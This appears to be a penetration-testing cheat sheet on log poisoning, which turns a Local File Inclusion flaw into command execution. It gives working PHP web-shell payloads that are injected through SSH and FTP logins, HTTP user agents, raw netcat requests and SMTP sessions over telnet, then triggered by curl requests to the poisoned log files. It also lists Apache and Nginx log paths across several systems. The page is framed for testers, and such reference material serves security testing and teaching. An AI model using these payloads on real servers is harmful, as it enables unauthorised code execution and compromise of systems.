Log Poisoning is a common technique used to gain a reverse shell from a LFI vulnerability. To make it work an attacker attempts to inject malicious input to the server log.
Practice
If you use double quotes for the shell instead of simple quotes, the double quotes will be modified for the string "quote;", PHP will throw an error there and nothing else will be executed
make sure you write correctly the payload or PHP will error every time it tries to load the log file and you won't have a second opportunity.
/var/log/auth.log
We can try to log in with SSH using a crafted login. On a Linux system, the login will be echoed in /var/log/auth.log. By exploiting a Local File Inclusion, the attacker will be able to make the crafted login echoed in this file interpreted by the server.
# Sending the payload via SSH
ssh '<?php phpinfo(); ?>'@$TARGET
# Accessing the log file via LFI
curl --user-agent "PENTEST" $URL/?parameter=/var/log/auth.log&cmd=id
/var/log/vsftpd.log
When the FTP service is available, testers can try to access the /var/log/vsftpd.log and see if any content is displayed. If that's the case, log poisoning may be possible by connecting via FTP and trying to login setting the PHP payload in the username and then access the logs using the LFI.
# Sending the payload via FTP
ftp $TARGET_IP
> '<?php system($_GET['cmd'])?>'
# Accessing the log file via LFI
curl --user-agent "PENTEST" $URL/?parameter=/var/log/vsftpd.log&cmd=id
Apache/Nginx access.log
When the web application is using an Apache2 or Nginx server, the access.log may be accessible using an LFI.
# Sending the payload in user agent via curl
curl --user-agent "<?php passthru(\$_GET['cmd']); ?>" $URL
# Accessing the log file via LFI
curl $URL/?parameter=/var/log/apache2/access.log&cmd=id
You may find the access.log files on the following locations, for more locations you may use one of this :
# APACHE LOG FILE
## RHEL/Red Hat/CentOS/Fedora
/var/log/httpd/access_log
## Debian/Ubuntu
/var/log/apache2/access.log
/var/log/apache/access.log
/usr/local/apache2/log/access.log
/usr/local/apache/log/access.log
## FreeBSD
/var/log/httpd-access.log
## Windows
C:\xampp\apache\logs\access.log
# NGINX LOG FILE
## Linux
/var/log/nginx/access.log
## Windows
C:\nginx\logs\access.log
Apache/Nginx error.log
This one is similar to the access.log, but instead of putting simple requests in the log file, it will put errors in error.log.
As the /<?php passthru($_GET['cmd']); ?> page doesn't exist, it will be logged to the error.log
# Sending the payload via netcat (avoid url encoding)
nc $TARGET_IP $TARGET_PORT
> GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
> Host: $TARGET_IP
> Connection: close
# Accessing the log file via LFI
curl $URL/?parameter=/var/log/apache2/error.log&cmd=id
# APACHE LOG FILE
## RHEL/Red Hat/CentOS/Fedora
/var/log/httpd/error_log
## Debian/Ubuntu
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache2/log/error.log
/usr/local/apache/log/error.log
## FreeBSD
/var/log/httpd-error.log
## Windows
C:\xampp\apache\logs\access.log
# NGINX LOG FILE
## Linux
/var/log/nginx/error.log
## Windows
C:\nginx\logs\error.log
Email Logs
When an SMTP server is running and writing logs in /var/log/mail.log, it's possible to inject a payload using telnet (as an example).
# Sending the payload via telnet
telnet $TARGET_IP $TARGET_PORT*
> HELO $DOMAIN
> MAIL FROM:<pentest@pentest.com>
> RCPT TO:<?php system($_GET['cmd']); ?>
# Accessing the log file via LFI
curl "$URL/?parameter=/var/log/mail.log&cmd=id"
Alternatively, send a mail to a internal account (user@localhost) containing your PHP payload
# Sending the payload via telnet
telnet $TARGET_IP $TARGET_PORT
> HELO localhost
> MAIL FROM:<pentest@pentest.com>
> RCPT TO:<www-data@localhost>
> DATA
> subject: RCE
> <?php system($_GET['cmd']); ?>
> .
# Accessing the log file via LFI
curl "$URL/?parameter=/var/spool/mail/www-data&cmd=id"
References
You may find the access.log files on the following locations, for more locations you may use one of this :
